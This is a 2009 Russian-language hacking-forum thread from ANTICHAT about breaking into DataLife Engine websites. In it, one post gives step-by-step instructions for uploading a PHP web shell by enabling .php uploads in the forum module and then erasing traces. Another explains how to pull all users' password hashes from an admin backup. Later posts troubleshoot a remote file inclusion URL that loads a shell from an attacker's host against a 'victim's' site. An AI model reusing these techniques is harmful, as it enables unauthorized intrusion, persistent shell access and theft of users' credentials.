HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 25.09.2009, 17:58
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

можно ли через пользователя залить шелл?
имеется доступ /admin.php?mod=addnews&action=addnews
 
Ответить с цитированием

  #72  
Старый 08.10.2009, 20:35
SpYeR
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705

Репутация: 6
По умолчанию

hackmon, нельзя.
В последних версиях, по-моему, вообще нереально, имея даже полный доступ в админку.
 
Ответить с цитированием

  #73  
Старый 09.10.2009, 16:00
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Если имеется установленный модуль DLE forum - то шелл залить проще простого, имея доступ в админку.

Заходим в админку - другие разделы - настройка модуля DLE forum (/admin.php?mod=options&action=options)
Настройка (/admin.php?mod=forum&action=tools) - таб "настройка загрузки файлов на сервер".
В "Расширение файлов, допустимых к загрузке" дописываем ",php", сохраняем.
Идем на форум, выбираем любую тему, нажимаем "ответить", в нвоом окне нажимает на значок папки (выше поля ввода сообщения).
Там выбираем наш шелл в .PHP формате (.php обрезается самим движком). Грузим, вставляем в пост (аттачмент), постим. Видим в посте линк. переходим - вот и наш шелл.
после этого можно залить наш шелл в другое место, удалить этот и стереть пост.
Ну и, главное, не забыть в админке в настройках убрать добавленное разрешени PHP
(с)WildShaman 2009
 
Ответить с цитированием

  #74  
Старый 11.10.2009, 04:39
SpYeR
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705

Репутация: 6
По умолчанию

wildshaman,
только что попробовал, не получилось. Скорее всего из-за ЧПУ. По-моему, оно должно быть отключено.
 
Ответить с цитированием

  #75  
Старый 11.10.2009, 11:40
denniselite
Новичок
Регистрация: 07.10.2009
Сообщений: 8
Провел на форуме:
150434

Репутация: 7
Отправить сообщение для denniselite с помощью ICQ
По умолчанию

Люди подскажите как можно вытащить хеши паролей всех пользователей без доступа к бд?
 
Ответить с цитированием

  #76  
Старый 12.10.2009, 09:16
SpYeR
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705

Репутация: 6
По умолчанию

Цитата:
Сообщение от denniselite  
Люди подскажите как можно вытащить хеши паролей всех пользователей без доступа к бд?
Если есть доступ в админку, то сделать бэкап базы, скачать его, и вытащить оттуда.
 
Ответить с цитированием

  #77  
Старый 16.10.2009, 19:51
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

у мня проблема вот линк http://www.milw0rm.com/exploits/9572
там эксплоит www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]

вместо сайт я вставляю сайт жертвы (и знаю что там установлена такая же версия)


эта строчко остается неизменная /engine/api/api.class.php?dle_config_api=

и шелл Я загрузил на site narod.ru тоесть после config_api= я ввожу линк на свой сайт с шеллом

пс убирал расширение ничего

кто потскажет
 
Ответить с цитированием

  #78  
Старый 16.10.2009, 20:08
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

http://site-na-dle.ru/engine/api/api.class.php?dle_config_api=http://site.narod.ru/.txt?
так делал? с вопросом в конце.
 
Ответить с цитированием

  #79  
Старый 16.10.2009, 20:18
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Цитата:
Сообщение от wildshaman  
http://site-na-dle.ru/engine/api/api.class.php?dle_config_api=http://site.narod.ru/.txt?
так делал? с вопросом в конце.
все равно
 
Ответить с цитированием

  #80  
Старый 16.10.2009, 21:17
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию

Цитата:
Сообщение от hackmon  
у мня проблема вот линк http://www.milw0rm.com/exploits/9572
там эксплоит www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]

вместо сайт я вставляю сайт жертвы (и знаю что там установлена такая же версия)


эта строчко остается неизменная /engine/api/api.class.php?dle_config_api=

и шелл Я загрузил на site narod.ru тоесть после config_api= я ввожу линк на свой сайт с шеллом

пс убирал расширение ничего

кто потскажет
Может register_globals = Off
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Сценарии/CMF/СMS 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ